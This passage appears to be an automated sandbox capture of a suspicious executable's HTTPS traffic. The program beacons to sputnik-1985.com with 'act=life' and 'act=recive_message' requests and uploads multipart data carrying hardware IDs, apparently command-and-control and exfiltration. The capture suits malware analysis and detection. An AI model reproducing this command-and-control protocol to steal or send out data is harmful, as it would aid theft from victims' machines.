2025-01-11 06:48:34 UTC | 495 | IN | Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
    Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.10 | 49708       | 104.21.80.1    | 443              | 7464 | C:\Users\user\Desktop\xNuh0DUJaG.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 06:48:34 UTC | 263 | OUT |
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sputnik-1985.com

2025-01-11 06:48:34 UTC | 8 | OUT |
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

2025-01-11 06:48:35 UTC | 1125 | IN |
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 06:48:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=p1bejmrcbm60sf2cokplcsnbvo; expires=Wed, 07 May 2025 00:35:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qd1C%2FHtDA%2BK%2B88eZDTbyxRiYrtgd9pd096rxoPJFfy4zDrVhxxXOh9X4mfDuz%2FQJGxMLsFDEv7di9f0%2BPQtskhIyCV0NTmQ0XLeTK7MatEqVmZmWi5DIDmfT5EfGRXXStTHI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9002f640af8142d2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1553&rtt_var=590&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1843434&cwnd=229&unsent_bytes=0&cid=949ce856bcc69d52&ts=455&x=0"

2025-01-11 06:48:35 UTC | 7 | IN |
Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok

2025-01-11 06:48:35 UTC | 5 | IN |
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.10 | 49714       | 104.21.80.1    | 443              | 7464 | C:\Users\user\Desktop\xNuh0DUJaG.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 06:48:35 UTC | 264 | OUT |
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 74
Host: sputnik-1985.com

2025-01-11 06:48:35 UTC | 74 | OUT |
Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f

2025-01-11 06:48:36 UTC | 1121 | IN |
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 06:48:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qojqve21keiginspivr699iomp; expires=Wed, 07 May 2025 00:35:15 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKgO%2BWYJyYo6zCOPxNSDJZUwB9h%2FJSZeRYVvcYd3pvz%2B1ZIaExxXekNCE6ptNJ1wRYfmtURQHFr7J4PMeqVnCWYq1F2XEvbcnZuH6oKADnMfTPHN4cUmxdO1YAymTKnR9cn0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9002f647aafb43ee-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1654&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=974&delivery_rate=1686886&cwnd=228&unsent_bytes=0&cid=629d85fbe8463ccf&ts=513&x=0"
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC248INData Raw: 34 36 39 0d 0a 52 33 7a 46 57 4f 73 74 6a 5a 2b 71 38 67 6b 4d 2b 38 70 69 43 51 34 63 42 30 5a 63 57 6e 67 36 2b 73 6d 67 76 75 4b 52 55 52 77 38 58 72 4e 36 30 52 6d 68 76 64 6d 58 4b 7a 61 50 75 42 64 73 49 6a 35 6d 49 6e 35 67 48 6c 75 57 75 73 57 53 77 4f 63 38 50 6e 30 61 70 44 53 59 53 4b 47 39 7a 34 6f 72 4e 71 43 78 51 47 78 67 50 6a 31 6b 4f 54 41 61 57 35 61 72 77 64 57 4e 34 54 31 2f 4c 78 43 69 4d 49 35 4f 36 66 37 47 6e 32 78 70 6e 71 73 49 5a 32 64 78 62 79 74 2b 64 6c 70 66 67 4f 75 61 6e 4b 2f 30 4a 58 30 4b 48 62 59 7a 79 56 43 68 35 49 69 58 5a 79 37 42 36 41 4e 73 62 48 42 68 49 6a 63 79 45 46 4b 65 71 73 54 55 6b 76 67 33 64 43 38 65 6f 54 47 45 52 2f 33 7a 7a 4a 68 6e 62 35 53 72 51 43 55 73 65 58 31 6b 5a 6e 68
                                                                                                                                                                                                                                      Data Ascii: 469R3zFWOstjZ+q8gkM+8piCQ4cB0ZcWng6+smgvuKRURw8XrN60RmhvdmXKzaPuBdsIj5mIn5gHluWusWSwOc8Pn0apDSYSKG9z4orNqCxQGxgPj1kOTAaW5arwdWN4T1/LxCiMI5O6f7Gn2xpnqsIZ2dxbyt+dlpfgOuanK/0JX0KHbYzyVCh5IiXZy7B6ANsbHBhIjcyEFKeqsTUkvg3dC8eoTGER/3zzJhnb5SrQCUseX1kZnh
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC888INData Raw: 4a 61 70 75 36 30 38 6d 4e 34 7a 55 2b 4f 6c 43 2b 65 6f 35 44 72 36 57 49 6d 47 64 67 6e 4b 73 50 62 47 31 2b 64 79 73 2b 4f 78 4a 51 6e 4b 48 4e 30 34 2f 39 4f 58 6b 74 46 36 41 31 6a 6b 66 70 38 73 76 51 4a 53 36 65 73 45 41 7a 4c 46 35 31 4a 7a 30 73 46 30 6e 59 74 49 7a 46 77 50 51 2f 50 6e 31 65 6f 54 53 49 51 75 2f 76 77 4a 74 67 61 34 75 6a 43 57 5a 68 66 6d 67 75 4d 54 73 61 58 35 4b 68 7a 64 61 45 2f 6a 35 34 4a 52 37 6e 64 4d 6c 49 39 37 32 51 30 45 68 72 69 61 38 4d 66 53 35 45 4a 54 74 77 49 56 70 66 6c 4f 75 61 6e 49 6a 32 4d 48 30 75 45 61 51 79 67 6c 33 76 37 38 36 64 62 6e 79 66 72 51 35 68 62 32 78 76 4b 6a 67 37 45 31 4f 52 72 73 58 59 77 4c 31 7a 65 54 31 65 2f 33 71 6f 51 75 54 78 77 6f 64 72 4c 6f 62 6d 47 53 74 72 63 69 56 38 66 6a
                                                                                                                                                                                                                                      Data Ascii: Japu608mN4zU+OlC+eo5Dr6WImGdgnKsPbG1+dys+OxJQnKHN04/9OXktF6A1jkfp8svQJS6esEAzLF51Jz0sF0nYtIzFwPQ/Pn1eoTSIQu/vwJtga4ujCWZhfmguMTsaX5KhzdaE/j54JR7ndMlI972Q0Ehria8MfS5EJTtwIVpflOuanIj2MH0uEaQygl3v786dbnyfrQ5hb2xvKjg7E1ORrsXYwL1zeT1e/3qoQuTxwodrLobmGStrciV8fj
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 34 38 32 37 0d 0a 57 68 69 63 47 49 79 66 69 64 55 51 64 69 73 7a 70 7a 59 73 7a 78 78 4b 68 61 6e 4f 34 31 43 36 2f 7a 46 6e 47 4a 74 6c 61 51 49 5a 6d 42 36 61 69 77 32 4f 78 4a 4b 6c 71 58 45 32 6f 44 32 63 7a 42 6c 47 62 39 36 30 51 2f 4c 38 39 2b 45 59 43 79 73 71 77 35 6c 61 32 67 6c 4f 33 41 68 57 6c 2b 55 36 35 71 63 6a 76 34 34 63 69 49 58 70 6a 6d 4a 52 65 48 79 77 70 68 6a 62 70 53 70 43 32 4e 71 63 32 34 72 4d 54 38 53 57 35 53 75 7a 39 2f 41 76 58 4e 35 50 56 37 2f 65 71 78 42 37 4f 7a 5a 30 6c 35 74 6c 36 59 48 66 53 78 68 4b 7a 31 2b 50 78 59 59 77 4f 76 49 32 34 66 33 50 6e 51 6d 47 71 4d 33 68 6b 62 6d 39 4e 71 61 5a 32 43 4c 70 51 70 75 59 6e 4a 67 4b 7a 34 35 47 31 61 53 6f 49 4b 53 77 50 51 72 50 6e 31 65 69 44 65 5a 58 65 58 32 32 64
                                                                                                                                                                                                                                      Data Ascii: 4827WhicGIyfidUQdiszpzYszxxKhanO41C6/zFnGJtlaQIZmB6aiw2OxJKlqXE2oD2czBlGb960Q/L89+EYCysqw5la2glO3AhWl+U65qcjv44ciIXpjmJReHywphjbpSpC2Nqc24rMT8SW5Suz9/AvXN5PV7/eqxB7OzZ0l5tl6YHfSxhKz1+PxYYwOvI24f3PnQmGqM3hkbm9NqaZ2CLpQpuYnJgKz45G1aSoIKSwPQrPn1eiDeZXeX22d
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 73 45 41 7a 4c 46 46 6d 4d 6a 52 34 42 52 61 42 36 38 58 51 77 4b 74 7a 64 43 6b 61 70 44 61 41 51 2b 4c 38 7a 4a 64 6d 61 70 6d 75 42 6d 35 74 64 57 30 6f 4d 54 49 57 58 4a 53 69 78 4e 43 44 38 44 55 2b 61 31 36 67 49 73 6b 58 72 39 7a 46 6d 32 64 75 6d 72 6b 48 4b 79 49 2b 61 79 49 2b 65 45 4a 4f 69 4c 7a 46 77 38 37 71 63 33 6b 70 58 76 39 36 67 31 33 71 38 38 79 61 62 6d 71 56 6f 67 42 75 66 6e 5a 6a 49 7a 49 77 48 31 65 65 72 73 2f 62 69 2f 41 68 62 43 59 61 71 54 62 4a 41 61 2f 36 30 4e 41 7a 4c 72 79 2f 41 33 74 71 66 53 55 37 63 43 46 61 58 35 54 72 6d 70 79 41 2f 54 39 31 49 68 57 73 50 6f 31 50 34 76 62 47 6e 6d 4a 69 6b 61 51 48 65 57 46 37 62 53 34 33 50 52 5a 56 6d 37 6e 42 33 63 43 39 63 33 6b 39 58 76 39 36 72 6e 7a 59 33 6f 69 50 4a 58 66
                                                                                                                                                                                                                                      Data Ascii: sEAzLFFmMjR4BRaB68XQwKtzdCkapDaAQ+L8zJdmapmuBm5tdW0oMTIWXJSixNCD8DU+a16gIskXr9zFm2dumrkHKyI+ayI+eEJOiLzFw87qc3kpXv96g13q88yabmqVogBufnZjIzIwH1eers/bi/AhbCYaqTbJAa/60NAzLry/A3tqfSU7cCFaX5TrmpyA/T91IhWsPo1P4vbGnmJikaQHeWF7bS43PRZVm7nB3cC9c3k9Xv96rnzY3oiPJXf
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 7a 51 2b 53 53 63 78 4d 31 70 48 31 72 4b 43 32 34 79 7a 61 7a 34 69 46 71 38 30 69 6b 6e 6b 38 63 53 52 59 6d 69 63 6f 41 64 6b 61 33 64 69 4a 44 67 71 48 56 57 52 71 38 6e 56 69 76 63 79 64 57 56 51 35 7a 32 52 44 37 65 39 2b 70 64 39 66 70 72 6f 48 79 56 31 50 6d 49 6f 66 6d 42 61 56 59 71 71 78 38 36 45 2f 44 68 73 4c 68 69 6e 50 35 74 49 34 2f 66 48 6b 32 4e 6a 6d 71 41 53 61 32 46 2b 64 7a 59 34 4d 78 51 59 31 75 76 46 78 4d 43 72 63 30 38 79 46 65 63 6c 78 31 61 76 2b 73 54 51 4d 79 36 61 6f 67 31 6c 66 6e 70 6a 4c 7a 30 32 45 6c 32 51 72 38 6a 52 6a 2f 67 35 64 79 30 65 71 44 2b 42 52 4f 6e 7a 79 5a 5a 6e 59 39 6e 6d 51 47 78 30 50 6a 31 6b 47 53 49 58 58 6f 2b 36 39 39 75 41 6f 6e 4e 68 61 77 66 6e 50 59 55 50 74 37 33 46 6e 47 46 6a 6e 4b 77 49
                                                                                                                                                                                                                                      Data Ascii: zQ+SScxM1pH1rKC24yzaz4iFq80iknk8cSRYmicoAdka3diJDgqHVWRq8nVivcydWVQ5z2RD7e9+pd9fproHyV1PmIofmBaVYqqx86E/DhsLhinP5tI4/fHk2NjmqASa2F+dzY4MxQY1uvFxMCrc08yFeclx1av+sTQMy6aog1lfnpjLz02El2Qr8jRj/g5dy0eqD+BROnzyZZnY9nmQGx0Pj1kGSIXXo+699uAonNhawfnPYUPt73FnGFjnKwI
                                                                                                                                                                                                                                      2025-01-11 06:48:36 UTC1369INData Raw: 73 39 66 6a 38 57 47 4d 44 72 7a 4e 47 47 38 6a 4a 32 4c 52 36 68 4d 49 31 4d 35 76 37 50 6d 57 31 6c 6d 71 49 50 62 47 70 36 5a 53 38 35 4e 68 78 64 6b 36 4b 43 6b 73 44 30 4b 7a 35 39 58 6f 45 5a 6d 31 33 64 38 38 75 4c 4b 33 48 58 73 55 42 73 59 44 34 39 5a 44 55 77 46 55 71 64 6f 73 72 59 69 66 4d 33 64 43 67 5a 70 7a 2b 45 53 75 76 7a 7a 4a 64 72 59 70 61 76 43 47 52 6f 66 6d 70 6b 63 48 67 64 51 4e 6a 7a 67 76 79 4c 35 52 4a 77 4c 67 7a 6e 4a 63 64 57 72 2f 72 45 30 44 4d 75 6c 36 45 42 59 32 4a 79 62 53 41 73 4f 42 46 52 6c 36 72 4e 33 49 50 79 4f 58 59 33 47 4b 63 78 67 55 6a 6e 2b 63 61 43 61 6d 48 5a 35 6b 42 73 64 44 34 39 5a 41 38 75 48 56 2b 58 36 65 76 62 6d 2f 49 35 66 53 34 53 35 79 58 48 56 71 2f 36 78 4e 41 7a 4c 70 53 6b 44 57 39 2b 63
                                                                                                                                                                                                                                      Data Ascii: s9fj8WGMDrzNGG8jJ2LR6hMI1M5v7PmW1lmqIPbGp6ZS85Nhxdk6KCksD0Kz59XoEZm13d88uLK3HXsUBsYD49ZDUwFUqdosrYifM3dCgZpz+ESuvzzJdrYpavCGRofmpkcHgdQNjzgvyL5RJwLgznJcdWr/rE0DMul6EBY2JybSAsOBFRl6rN3IPyOXY3GKcxgUjn+caCamHZ5kBsdD49ZA8uHV+X6evbm/I5fS4S5yXHVq/6xNAzLpSkDW9+c
2025-01-11 06:48:36 UTC  1369  IN  Data Raw: 34 51 68 69 54 70 63 66 64 6a 50 6b 30 63 44 63 66 72 54 61 49 53 4f 6a 32 32 70 74 35 5a 5a 47 72 44 6d 4e 6c 66 6d 73 6b 50 7a 55 61 47 4e 62 72 78 63 54 41 71 33 4e 62 42 67 6d 78 4d 4d 74 73 2b 4f 76 43 6c 32 64 34 6b 71 6b 44 66 57 46 75 4a 57 70 2b 4b 52 31 4a 32 50 50 55 7a 4a 66 30 4c 44 41 38 58 71 41 32 79 52 65 76 39 73 65 65 5a 6d 57 64 6f 51 56 6a 62 33 74 67 4c 6a 49 30 47 31 43 52 6f 63 66 5a 68 76 6b 77 63 43 6f 66 71 7a 36 41 51 65 61 39 68 74 42 73 64 74 6e 77 51 46 31 38 65 58 30 70 4c 6e 6f 6f 57 34 6d 36 31 39 47 51 39 58 46 52 4a 68 4b 6b 50 34 35 66 72 2b 4b 47 69 53 74 70 6c 65 68 59 4b 32 78 36 61 53 63 35 4e 68 56 56 6c 36 7a 4a 30 34 72 39 49 58 45 67 46 71 73 79 68 46 33 6c 39 39 71 5a 59 6d 4f 58 6f 42 4a 6f 4c 44 41 6c 49 79
  Data Ascii: 4QhiTpcfdjPk0cDcfrTaISOj22pt5ZZGrDmNlfmskPzUaGNbrxcTAq3NbBgmxMMts+OvCl2d4kqkDfWFuJWp+KR1J2PPUzJf0LDA8XqA2yRev9seeZmWdoQVjb3tgLjI0G1CRocfZhvkwcCofqz6AQea9htBsdtnwQF18eX0pLnooW4m619GQ9XFRJhKkP45fr+KGiStplehYK2x6aSc5NhVVl6zJ04r9IXEgFqsyhF3l99qZYmOXoBJoLDAlIy
2025-01-11 06:48:36 UTC  1369  IN  Data Raw: 6d 2b 7a 38 34 71 44 34 4a 58 38 6f 46 61 73 45 74 31 72 73 38 38 61 58 66 58 2f 5a 35 6b 42 6b 4c 43 5a 63 5a 48 5a 34 4a 52 62 59 73 34 4b 45 77 4d 59 77 63 43 73 5a 73 53 76 45 62 2b 54 72 79 5a 31 67 59 74 75 70 44 58 74 72 50 69 74 6b 4f 48 68 43 43 4e 62 72 78 73 33 41 71 32 4d 73 66 6b 76 30 62 64 6b 64 38 4c 50 52 30 48 30 75 77 66 70 4f 4b 33 34 2b 50 57 52 35 4f 77 68 4b 6e 71 6a 55 33 38 66 4e 44 56 34 75 45 71 51 32 69 45 69 76 73 34 69 66 4b 7a 61 67 36 41 4e 35 66 6a 46 30 4d 6a 4d 6f 48 52 53 51 75 73 2f 51 77 4c 31 7a 4d 69 45 56 71 7a 2b 4f 58 36 44 76 32 4a 74 6e 65 4e 57 73 45 69 73 69 50 6e 51 76 4d 53 6f 55 58 39 65 36 31 4e 47 51 38 44 5a 35 61 52 61 32 4e 34 55 50 6f 62 33 64 6d 32 64 6f 6c 4c 31 50 65 6e 70 39 63 79 4e 79 4d 41 74
  Data Ascii: m+z84qD4JX8oFasEt1rs88aXfX/Z5kBkLCZcZHZ4JRbYs4KEwMYwcCsZsSvEb+TryZ1gYtupDXtrPitkOHhCCNbrxs3Aq2Msfkv0bdkd8LPR0H0uwfpOK34+PWR5OwhKnqjU38fNDV4uEqQ2iEivs4ifKzag6AN5fjF0MjMoHRSQus/QwL1zMiEVqz+OX6Dv2JtneNWsEisiPnQvMSoUX9e61NGQ8DZ5aRa2N4UPob3dm2dolL1Penp9cyNyMAt
2025-01-11 06:48:36 UTC  1369  IN  Data Raw: 5a 4c 41 36 33 4d 6d 5a 53 75 6b 4e 49 64 49 2b 65 79 46 74 6d 68 70 6e 36 73 4f 66 48 30 2b 4b 32 51 34 65 45 49 4b 31 75 76 47 7a 63 43 72 59 79 78 2b 53 2f 52 74 32 52 33 77 73 39 48 51 66 53 37 42 2b 30 34 72 66 6a 34 39 5a 48 6b 32 46 31 6d 62 70 63 48 4f 6b 76 55 77 61 43 5a 5a 6d 51 53 73 51 75 4c 34 78 70 64 56 55 4c 69 69 45 47 5a 6a 65 56 73 61 43 53 6b 64 53 4e 71 4e 77 63 71 44 73 33 30 2b 50 56 37 2f 65 71 68 46 2f 2f 44 48 6c 79 73 67 32 61 78 41 4d 79 78 62 61 43 6b 37 4e 68 30 61 75 61 48 53 30 59 2f 30 63 7a 42 6c 45 75 64 69 79 55 37 6c 37 63 57 66 62 43 4b 65 73 67 63 72 49 6a 35 72 5a 47 5a 34 47 31 4b 49 70 73 33 62 7a 50 55 39 63 47 55 42 36 53 50 4a 57 61 2b 6c 6d 39 34 72 66 4e 6e 77 51 43 78 69 63 32 51 6e 4d 44 73 49 53 70 36 6f
  Data Ascii: ZLA63MmZSukNIdI+eyFtmhpn6sOfH0+K2Q4eEIK1uvGzcCrYyx+S/Rt2R3ws9HQfS7B+04rfj49ZHk2F1mbpcHOkvUwaCZZmQSsQuL4xpdVULiiEGZjeVsaCSkdSNqNwcqDs30+PV7/eqhF//DHlysg2axAMyxbaCk7Nh0auaHS0Y/0czBlEudiyU7l7cWfbCKesgcrIj5rZGZ4G1KIps3bzPU9cGUB6SPJWa+lm94rfNnwQCxic2QnMDsISp6o


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.10  49725        104.21.80.1     443               7464  C:\Users\user\Desktop\xNuh0DUJaG.exe

Timestamp  Bytes transferred  Direction  Data
2025-01-11 06:48:37 UTC  278  OUT  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=OG13XW2VA62H57
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 12818
  Host: sputnik-1985.com
2025-01-11 06:48:37 UTC  12818  OUT  Data Raw: 2d 2d 4f 47 31 33 58 57 32 56 41 36 32 48 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 41 32 43 37 41 44 38 39 43 33 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 4f 47 31 33 58 57 32 56 41 36 32 48 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 47 31 33 58 57 32 56 41 36 32 48 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4f 47 31 33 58 57 32 56 41 36 32 48 35
  Data Ascii: --OG13XW2VA62H57Content-Disposition: form-data; name="hwid"43A2C7AD89C30672D0632DF0E28DC412--OG13XW2VA62H57Content-Disposition: form-data; name="pid"2--OG13XW2VA62H57Content-Disposition: form-data; name="lid"4h5VfH----OG13XW2VA62H5
2025-01-11 06:48:38 UTC  1126  IN  HTTP/1.1 200 OK
  Date: Sat, 11 Jan 2025 06:48:37 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=1vs2nvc010eue2bkv3io64aeoo; expires=Wed, 07 May 2025 00:35:16 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjA7MmxR8Qj7SX%2FpaTA27Wjd1Z%2BAgiDVwfTIT7l8piNv3E%2Fcxm5Aq0X58YCwrPK91oY7BTV7C0I%2FjuIV15oXeLcKQAY6OvC8Hc8CHasRY2StTwo0Mwd5bZKjfe6orcsYQuIT"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9002f651fc3c0f36-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1471&rtt_var=554&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13754&delivery_rate=1968981&cwnd=231&unsent_bytes=0&cid=76a66f24a5664bab&ts=646&x=0"
2025-01-11 06:48:38 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2025-01-11 06:48:38 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.10  49734        104.21.80.1     443               7464  C:\Users\user\Desktop\xNuh0DUJaG.exe

Timestamp  Bytes transferred  Direction  Data
2025-01-11 06:48:38 UTC  272  OUT  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=86RQ8NVH
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 15009
  Host: sputnik-1985.com
2025-01-11 06:48:38 UTC  15009  OUT  Data Raw: 2d 2d 38 36 52 51 38 4e 56 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 33 41 32 43 37 41 44 38 39 43 33 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 38 36 52 51 38 4e 56 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 36 52 51 38 4e 56 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 38 36 52 51 38 4e 56 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
  Data Ascii: --86RQ8NVHContent-Disposition: form-data; name="hwid"43A2C7AD89C30672D0632DF0E28DC412--86RQ8NVHContent-Disposition: form-data; name="pid"2--86RQ8NVHContent-Disposition: form-data; name="lid"4h5VfH----86RQ8NVHContent-Disposition:
2025-01-11 06:48:39 UTC  1126  IN  HTTP/1.1 200 OK
  Date: Sat, 11 Jan 2025 06:48:39 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=j5empeuf7983tbpqm7ungth91a; expires=Wed, 07 May 2025 00:35:17 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Rwk20RqJqqLkobXhFj0O4XX9SKJgQ4xqbb0V7BVl1pkt%2Fk4RjgfTMsFTXtQuG8usVYVOEEzzIMAvRsd0Se6H14egp0GnsrSzgAg5WRuCmYDCR65ahRd%2F7hPaMqaE9%2B7rmg%2B"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9002f659f8108c0f-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1932&rtt_var=736&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15939&delivery_rate=1476238&cwnd=223&unsent_bytes=0&cid=dff3ebf726c4d0e4&ts=418&x=0"
2025-01-11 06:48:39 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
  Data Ascii: fok 8.46.123.189
2025-01-11 06:48:39 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
